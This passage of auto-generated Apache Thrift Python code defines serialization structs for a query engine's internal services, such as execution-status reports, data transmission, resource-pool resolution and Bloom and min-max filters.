          (_etype104, _size101) = iprot.readListBegin()
          for _i105 in xrange(_size101):
            _elem106 = TFragmentInstanceExecStatus()
            _elem106.read(iprot)
            self.instance_exec_status.append(_elem106)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRUCT:
          self.insert_exec_status = TInsertExecStatus()
          self.insert_exec_status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.MAP:
          self.error_log = {}
          (_ktype108, _vtype109, _size107 ) = iprot.readMapBegin()
          for _i111 in xrange(_size107):
            _key112 = iprot.readI32();
            _val113 = TErrorLogEntry()
            _val113.read(iprot)
            self.error_log[_key112] = _val113
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 7:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TReportExecStatusParams')
    if self.protocol_version is not None:
      oprot.writeFieldBegin('protocol_version', TType.I32, 1)
      oprot.writeI32(self.protocol_version)
      oprot.writeFieldEnd()
    if self.query_id is not None:
      oprot.writeFieldBegin('query_id', TType.STRUCT, 2)
      self.query_id.write(oprot)
      oprot.writeFieldEnd()
    if self.coord_state_idx is not None:
      oprot.writeFieldBegin('coord_state_idx', TType.I32, 3)
      oprot.writeI32(self.coord_state_idx)
      oprot.writeFieldEnd()
    if self.instance_exec_status is not None:
      oprot.writeFieldBegin('instance_exec_status', TType.LIST, 4)
      oprot.writeListBegin(TType.STRUCT, len(self.instance_exec_status))
      for iter114 in self.instance_exec_status:
        iter114.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.insert_exec_status is not None:
      oprot.writeFieldBegin('insert_exec_status', TType.STRUCT, 5)
      self.insert_exec_status.write(oprot)
      oprot.writeFieldEnd()
    if self.error_log is not None:
      oprot.writeFieldBegin('error_log', TType.MAP, 6)
      oprot.writeMapBegin(TType.I32, TType.STRUCT, len(self.error_log))
      for kiter115,viter116 in self.error_log.items():
        oprot.writeI32(kiter115)
        viter116.write(oprot)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 7)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.protocol_version is None:
      raise TProtocol.TProtocolException(message='Required field protocol_version is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TReportExecStatusResult:
  """
  Attributes:
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1
  )

  def __init__(self, status=None,):
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TReportExecStatusResult')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TCancelQueryFInstancesParams:
  """
  Attributes:
   - protocol_version
   - query_id
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'protocol_version', None, None, ), # 1
    (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2
  )

  def __init__(self, protocol_version=None, query_id=None,):
    self.protocol_version = protocol_version
    self.query_id = query_id

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.protocol_version = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.query_id = Types.ttypes.TUniqueId()
          self.query_id.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TCancelQueryFInstancesParams')
    if self.protocol_version is not None:
      oprot.writeFieldBegin('protocol_version', TType.I32, 1)
      oprot.writeI32(self.protocol_version)
      oprot.writeFieldEnd()
    if self.query_id is not None:
      oprot.writeFieldBegin('query_id', TType.STRUCT, 2)
      self.query_id.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.protocol_version is None:
      raise TProtocol.TProtocolException(message='Required field protocol_version is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TCancelQueryFInstancesResult:
  """
  Attributes:
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1
  )

  def __init__(self, status=None,):
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TCancelQueryFInstancesResult')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TTransmitDataParams:
  """
  Attributes:
   - protocol_version
   - dest_fragment_instance_id
   - sender_id
   - dest_node_id
   - row_batch
   - eos
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'protocol_version', None, None, ), # 1
    (2, TType.STRUCT, 'dest_fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2
    (3, TType.I32, 'sender_id', None, None, ), # 3
    (4, TType.I32, 'dest_node_id', None, None, ), # 4
    (5, TType.STRUCT, 'row_batch', (Results.ttypes.TRowBatch, Results.ttypes.TRowBatch.thrift_spec), None, ), # 5
    (6, TType.BOOL, 'eos', None, None, ), # 6
  )

  def __init__(self, protocol_version=None, dest_fragment_instance_id=None, sender_id=None, dest_node_id=None, row_batch=None, eos=None,):
    self.protocol_version = protocol_version
    self.dest_fragment_instance_id = dest_fragment_instance_id
    self.sender_id = sender_id
    self.dest_node_id = dest_node_id
    self.row_batch = row_batch
    self.eos = eos

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.protocol_version = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.dest_fragment_instance_id = Types.ttypes.TUniqueId()
          self.dest_fragment_instance_id.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.sender_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I32:
          self.dest_node_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRUCT:
          self.row_batch = Results.ttypes.TRowBatch()
          self.row_batch.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.BOOL:
          self.eos = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TTransmitDataParams')
    if self.protocol_version is not None:
      oprot.writeFieldBegin('protocol_version', TType.I32, 1)
      oprot.writeI32(self.protocol_version)
      oprot.writeFieldEnd()
    if self.dest_fragment_instance_id is not None:
      oprot.writeFieldBegin('dest_fragment_instance_id', TType.STRUCT, 2)
      self.dest_fragment_instance_id.write(oprot)
      oprot.writeFieldEnd()
    if self.sender_id is not None:
      oprot.writeFieldBegin('sender_id', TType.I32, 3)
      oprot.writeI32(self.sender_id)
      oprot.writeFieldEnd()
    if self.dest_node_id is not None:
      oprot.writeFieldBegin('dest_node_id', TType.I32, 4)
      oprot.writeI32(self.dest_node_id)
      oprot.writeFieldEnd()
    if self.row_batch is not None:
      oprot.writeFieldBegin('row_batch', TType.STRUCT, 5)
      self.row_batch.write(oprot)
      oprot.writeFieldEnd()
    if self.eos is not None:
      oprot.writeFieldBegin('eos', TType.BOOL, 6)
      oprot.writeBool(self.eos)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.protocol_version is None:
      raise TProtocol.TProtocolException(message='Required field protocol_version is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TTransmitDataResult:
  """
  Attributes:
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 1
  )

  def __init__(self, status=None,):
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TTransmitDataResult')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TResolveRequestPoolParams:
  """
  Attributes:
   - user
   - requested_pool
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'user', None, None, ), # 1
    (2, TType.STRING, 'requested_pool', None, None, ), # 2
  )

  def __init__(self, user=None, requested_pool=None,):
    self.user = user
    self.requested_pool = requested_pool

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.user = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.requested_pool = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TResolveRequestPoolParams')
    if self.user is not None:
      oprot.writeFieldBegin('user', TType.STRING, 1)
      oprot.writeString(self.user)
      oprot.writeFieldEnd()
    if self.requested_pool is not None:
      oprot.writeFieldBegin('requested_pool', TType.STRING, 2)
      oprot.writeString(self.requested_pool)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.user is None:
      raise TProtocol.TProtocolException(message='Required field user is unset!')
    if self.requested_pool is None:
      raise TProtocol.TProtocolException(message='Required field requested_pool is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
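# Illustrative sketch (not part of the generated interface): both fields of
# TResolveRequestPoolParams are required, so validate() rejects a partially
# constructed request. The user and pool names below are invented.
def _example_resolve_pool_params():
  params = TResolveRequestPoolParams(user='alice', requested_pool='default')
  params.validate()
  return params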
class TResolveRequestPoolResult:
  """
  Attributes:
   - resolved_pool
   - has_access
   - status
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'resolved_pool', None, None, ), # 1
    (2, TType.BOOL, 'has_access', None, None, ), # 2
    (3, TType.STRUCT, 'status', (Status.ttypes.TStatus, Status.ttypes.TStatus.thrift_spec), None, ), # 3
  )

  def __init__(self, resolved_pool=None, has_access=None, status=None,):
    self.resolved_pool = resolved_pool
    self.has_access = has_access
    self.status = status

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.resolved_pool = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.BOOL:
          self.has_access = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.status = Status.ttypes.TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TResolveRequestPoolResult')
    if self.resolved_pool is not None:
      oprot.writeFieldBegin('resolved_pool', TType.STRING, 1)
      oprot.writeString(self.resolved_pool)
      oprot.writeFieldEnd()
    if self.has_access is not None:
      oprot.writeFieldBegin('has_access', TType.BOOL, 2)
      oprot.writeBool(self.has_access)
      oprot.writeFieldEnd()
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 3)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TPoolConfigParams:
  """
  Attributes:
   - pool
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'pool', None, None, ), # 1
  )

  def __init__(self, pool=None,):
    self.pool = pool

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.pool = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPoolConfigParams')
    if self.pool is not None:
      oprot.writeFieldBegin('pool', TType.STRING, 1)
      oprot.writeString(self.pool)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.pool is None:
      raise TProtocol.TProtocolException(message='Required field pool is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TPoolConfig:
  """
  Attributes:
   - max_requests
   - max_queued
   - max_mem_resources
   - queue_timeout_ms
   - default_query_options
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'max_requests', None, None, ), # 1
    (2, TType.I64, 'max_queued', None, None, ), # 2
    (3, TType.I64, 'max_mem_resources', None, None, ), # 3
    (4, TType.I64, 'queue_timeout_ms', None, None, ), # 4
    (5, TType.STRING, 'default_query_options', None, None, ), # 5
  )

  def __init__(self, max_requests=None, max_queued=None, max_mem_resources=None, queue_timeout_ms=None, default_query_options=None,):
    self.max_requests = max_requests
    self.max_queued = max_queued
    self.max_mem_resources = max_mem_resources
    self.queue_timeout_ms = queue_timeout_ms
    self.default_query_options = default_query_options

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.max_requests = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.max_queued = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I64:
          self.max_mem_resources = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I64:
          self.queue_timeout_ms = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRING:
          self.default_query_options = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPoolConfig')
    if self.max_requests is not None:
      oprot.writeFieldBegin('max_requests', TType.I64, 1)
      oprot.writeI64(self.max_requests)
      oprot.writeFieldEnd()
    if self.max_queued is not None:
      oprot.writeFieldBegin('max_queued', TType.I64, 2)
      oprot.writeI64(self.max_queued)
      oprot.writeFieldEnd()
    if self.max_mem_resources is not None:
      oprot.writeFieldBegin('max_mem_resources', TType.I64, 3)
      oprot.writeI64(self.max_mem_resources)
      oprot.writeFieldEnd()
    if self.queue_timeout_ms is not None:
      oprot.writeFieldBegin('queue_timeout_ms', TType.I64, 4)
      oprot.writeI64(self.queue_timeout_ms)
      oprot.writeFieldEnd()
    if self.default_query_options is not None:
      oprot.writeFieldBegin('default_query_options', TType.STRING, 5)
      oprot.writeString(self.default_query_options)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.max_requests is None:
      raise TProtocol.TProtocolException(message='Required field max_requests is unset!')
    if self.max_queued is None:
      raise TProtocol.TProtocolException(message='Required field max_queued is unset!')
    if self.max_mem_resources is None:
      raise TProtocol.TProtocolException(message='Required field max_mem_resources is unset!')
    if self.default_query_options is None:
      raise TProtocol.TProtocolException(message='Required field default_query_options is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TBloomFilter:
  """
  Attributes:
   - log_heap_space
   - directory
   - always_true
   - always_false
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'log_heap_space', None, None, ), # 1
    (2, TType.STRING, 'directory', None, None, ), # 2
    (3, TType.BOOL, 'always_true', None, None, ), # 3
    (4, TType.BOOL, 'always_false', None, None, ), # 4
  )

  def __init__(self, log_heap_space=None, directory=None, always_true=None, always_false=None,):
    self.log_heap_space = log_heap_space
    self.directory = directory
    self.always_true = always_true
    self.always_false = always_false

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.log_heap_space = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.directory = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.always_true = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.BOOL:
          self.always_false = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TBloomFilter')
    if self.log_heap_space is not None:
      oprot.writeFieldBegin('log_heap_space', TType.I32, 1)
      oprot.writeI32(self.log_heap_space)
      oprot.writeFieldEnd()
    if self.directory is not None:
      oprot.writeFieldBegin('directory', TType.STRING, 2)
      oprot.writeString(self.directory)
      oprot.writeFieldEnd()
    if self.always_true is not None:
      oprot.writeFieldBegin('always_true', TType.BOOL, 3)
      oprot.writeBool(self.always_true)
      oprot.writeFieldEnd()
    if self.always_false is not None:
      oprot.writeFieldBegin('always_false', TType.BOOL, 4)
      oprot.writeBool(self.always_false)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.log_heap_space is None:
      raise TProtocol.TProtocolException(message='Required field log_heap_space is unset!')
    if self.always_true is None:
      raise TProtocol.TProtocolException(message='Required field always_true is unset!')
    if self.always_false is None:
      raise TProtocol.TProtocolException(message='Required field always_false is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TMinMaxFilter:
  """
  Attributes:
   - always_true
   - always_false
   - min
   - max
  """

  thrift_spec = (
    None, # 0
    (1, TType.BOOL, 'always_true', None, None, ), # 1
    (2, TType.BOOL, 'always_false', None, None, ), # 2
    (3, TType.STRUCT, 'min', (Data.ttypes.TColumnValue, Data.ttypes.TColumnValue.thrift_spec), None, ), # 3
    (4, TType.STRUCT, 'max', (Data.ttypes.TColumnValue, Data.ttypes.TColumnValue.thrift_spec), None, ), # 4
  )

  def
__init__(self, always_true=None, always_false=None, min=None, max=None,): self.always_true = always_true self.always_false = always_false self.min = min self.max = max def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.BOOL: self.always_true = iprot.readBool(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.BOOL: self.always_false = iprot.readBool(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.min = Data.ttypes.TColumnValue() self.min.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.max = Data.ttypes.TColumnValue() self.max.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TMinMaxFilter') if self.always_true is not None: oprot.writeFieldBegin('always_true', TType.BOOL, 1) oprot.writeBool(self.always_true) oprot.writeFieldEnd() if self.always_false is not None: oprot.writeFieldBegin('always_false', TType.BOOL, 2) oprot.writeBool(self.always_false) oprot.writeFieldEnd() if self.min is not None: oprot.writeFieldBegin('min', TType.STRUCT, 3) self.min.write(oprot) oprot.writeFieldEnd() if self.max is not None: oprot.writeFieldBegin('max', TType.STRUCT, 4) self.max.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.always_true is None: raise TProtocol.TProtocolException(message='Required field always_true is unset!') if self.always_false is None: raise TProtocol.TProtocolException(message='Required field always_false is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class 